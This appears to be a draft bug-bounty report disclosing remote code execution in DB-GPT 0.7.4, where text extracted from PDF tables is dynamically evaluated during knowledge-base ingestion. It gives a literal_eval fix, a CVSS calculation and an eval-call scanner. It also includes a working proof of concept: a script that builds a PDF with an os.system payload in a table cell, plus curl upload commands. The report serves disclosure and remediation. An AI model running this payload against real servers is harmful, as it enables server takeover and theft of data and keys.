# DB-GPT — Remote Code Execution via Python Code Evaluation on PDF Table Content

## meta
platform: huntr
program: DB-GPT
asset: https://github.com/eosphoros-ai/DB-GPT
date: 2026-02-13
status: DRAFT

````
Repository URL: https://github.com/eosphoros-ai/DB-GPT
Package Manager: pip
Version Affected: 0.7.4 (latest)
Vulnerability Type: Code Injection
CVSS:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: Low
  - User Interaction: None
  - Scope: Unchanged
  - Confidentiality: High
  - Integrity: High
  - Availability: High
Title: Remote Code Execution via dangerous code evaluation on PDF table content during knowledge base ingestion
Description:

# Description

The `PDFProcessor` class in `dbgpt-ext` reconstructs table data from uploaded PDF files by passing strings derived from those files to Python's built-in dynamic code evaluation function. When a PDF is uploaded to the knowledge base, `pdfplumber` extracts its table rows, and each row is stored as the string representation of a Python list via `str(row)` (line 447 of `packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py`). Later, the `_load()` method passes these strings to dynamic code evaluation (lines 185, 188, 215 and 218 of the same file) to convert them back into lists for markdown table formatting.

An attacker can craft a PDF containing a table whose cells hold Python expressions. When this PDF is uploaded and processed by the knowledge base ingestion pipeline, the injected Python code is executed on the server with the full privileges of the DB-GPT process.

The root cause is using dynamic code evaluation instead of `ast.literal_eval()` to deserialize data derived from untrusted input (uploaded PDF files).
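A minimal sketch of the suggested fix follows. It assumes the stored values keep the `str(row)` format described above. The helpers `parse_stored_row` and `rows_to_markdown` are hypothetical and not part of DB-GPT. `ast.literal_eval()` accepts only Python literal syntax (strings, numbers, lists, tuples, dicts, sets, booleans, `None`). A stored row such as `['Name', None]` therefore parses back into a list, while a string containing a call expression raises `ValueError` instead of being executed.

```python
import ast


def parse_stored_row(stored: str) -> list:
    """Parse a row saved as str(row) back into a list without running code.

    Hypothetical helper, meant to stand in for the dynamic evaluation calls.
    ast.literal_eval raises ValueError (or SyntaxError) for anything that is
    not a plain Python literal, such as a function call or attribute access.
    """
    value = ast.literal_eval(stored)
    if not isinstance(value, list):
        raise ValueError(f"expected a list literal, got {type(value).__name__}")
    return value


def rows_to_markdown(stored_rows: list) -> str:
    """Render stored row strings as a markdown table (hypothetical helper)."""
    if not stored_rows:
        return ""
    # A cell may be None; render it as an empty string
    rows = [
        ["" if cell is None else str(cell) for cell in parse_stored_row(row)]
        for row in stored_rows
    ]
    header, body = rows[0], rows[1:]
    lines = [
        "| " + " | ".join(header) + " |",
        "| " + " | ".join("---" for _ in header) + " |",
    ]
    lines += ["| " + " | ".join(cells) + " |" for cells in body]
    return "\n".join(lines)


if __name__ == "__main__":
    print(rows_to_markdown([str(["Name", "Value"]), str(["normal", None])]))
    try:
        parse_stored_row("__import__('os').getcwd()")
    except ValueError as exc:
        print("rejected:", exc)
```

Run directly, it prints a two-row markdown table followed by a `rejected:` line. A more robust design would store each row as a list, or serialize it with `json.dumps()` and read it back with `json.loads()`. Either approach would avoid parsing Python syntax altogether.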

# Proof of Concept

1. Create a malicious PDF with a table containing a Python payload in a cell:

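```python
# generate_malicious_pdf.py
# Requires: pip install reportlab
from reportlab.lib import colors
from reportlab.lib.pagesizes import letter
from reportlab.platypus import SimpleDocTemplate, Table

doc = SimpleDocTemplate("exploit.pdf", pagesize=letter)
# Payload placed in a table cell; it is meant to run when the row's
# string representation is dynamically evaluated during ingestion
payload = "__import__('os').system('id > /tmp/pwned')"
table_data = [
    ["Name", "Value"],
    ["normal", payload],
]
# Draw cell borders: pdfplumber's default table detection ("lines" strategy)
# relies on ruling lines, so a borderless table may not be extracted
table = Table(table_data, style=[("GRID", (0, 0), (-1, -1), 0.5, colors.black)])
doc.build([table])
```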

2. Upload `exploit.pdf` to a DB-GPT knowledge base via the API or web UI:

```bash
curl -X POST http://localhost:5670/api/v2/serve/knowledge/spaces \
  -H "Content-Type: application/json" \
  -d '{"name":"exploit_space","vector_type":"Chroma","desc":"test"}'

curl -X POST http://localhost:5670/api/v2/serve/knowledge/documents/upload \
  -F "space_id=exploit_space" \
  -F "files=@exploit.pdf"
```

3. When DB-GPT processes the PDF for RAG ingestion, the dynamic code evaluation calls at lines 185/188/215/218 execute the injected Python code.

4. Verify on the DB-GPT host: `cat /tmp/pwned` shows the output of `id`, confirming code execution.

**Impact**: This vulnerability allows full remote code execution on the DB-GPT server. An attacker who can upload a PDF to any knowledge base can run arbitrary OS commands with the privileges of the DB-GPT process. This can lead to complete server compromise, data exfiltration, lateral movement, and access to all connected databases and to LLM API keys stored in the environment.
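The CVSS metrics listed in the header correspond to the CVSS v3.1 vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`. The sketch below implements the v3.1 base-score formula for the scope-unchanged case, using the metric weights and `Roundup` definition from the FIRST specification. It yields 8.8 (High). The function name `base_score_scope_unchanged` is illustrative only.

```python
import math

# CVSS v3.1 metric weights from the FIRST specification
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR = {"N": 0.85, "L": 0.62, "H": 0.27}  # weights for Scope: Unchanged only
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def base_score_scope_unchanged(av, ac, pr, ui, c, i, a) -> float:
    """Base score for a scope-unchanged vector (illustrative helper)."""
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[av] * AC[ac] * PR[pr] * UI[ui]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


# Metrics from this report: AV:N AC:L PR:L UI:N S:U C:H I:H A:H
print(base_score_scope_unchanged("N", "L", "L", "N", "H", "H", "H"))  # 8.8
```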

**Occurrences**:
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L185
  - Description: Dangerous dynamic evaluation of `temp_table[0]` — evaluates string representation of PDF table header row as Python code
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L188
  - Description: Dangerous dynamic evaluation of `entry` — evaluates string representation of each PDF table data row as Python code
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L215
  - Description: Duplicate occurrence for the "last table" handling block (header)
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L218
  - Description: Duplicate occurrence for the "last table" handling block (rows)
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L442-L448
  - Description: `str(row)` stores table row as string — the source of data later passed to dangerous dynamic evaluation
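A short sketch can check for further call sites beyond those listed above. It walks a Python file's syntax tree and reports every direct call to the `eval`/`exec` built-ins by line number. It assumes a local checkout of the repository. The name `find_dynamic_eval_calls` is hypothetical. The sketch only catches calls made by bare name, so aliases such as `f = eval` are not detected.

```python
import ast
import sys

# Built-ins that evaluate or execute strings as Python code (CWE-95 sinks)
DANGEROUS = {"eval", "exec"}


def find_dynamic_eval_calls(source: str, filename: str = "<string>") -> list:
    """Return sorted (line, name) pairs for direct eval()/exec() calls."""
    tree = ast.parse(source, filename=filename)
    hits = []
    for node in ast.walk(tree):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in DANGEROUS
        ):
            hits.append((node.lineno, node.func.id))
    return sorted(hits)


if __name__ == "__main__":
    # Usage: python find_eval.py packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8") as fh:
            for lineno, name in find_dynamic_eval_calls(fh.read(), path):
                print(f"{path}:{lineno}: {name}()")
```

`ast.literal_eval(...)` is an attribute call rather than a bare name, so the safe replacement is not flagged.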

**References**:
- https://cwe.mitre.org/data/definitions/95.html — CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code
- https://docs.python.org/3/library/ast.html#ast.literal_eval — Python docs recommending ast.literal_eval() as safe alternative
- https://owasp.org/www-community/attacks/Code_Injection — OWASP Code Injection
````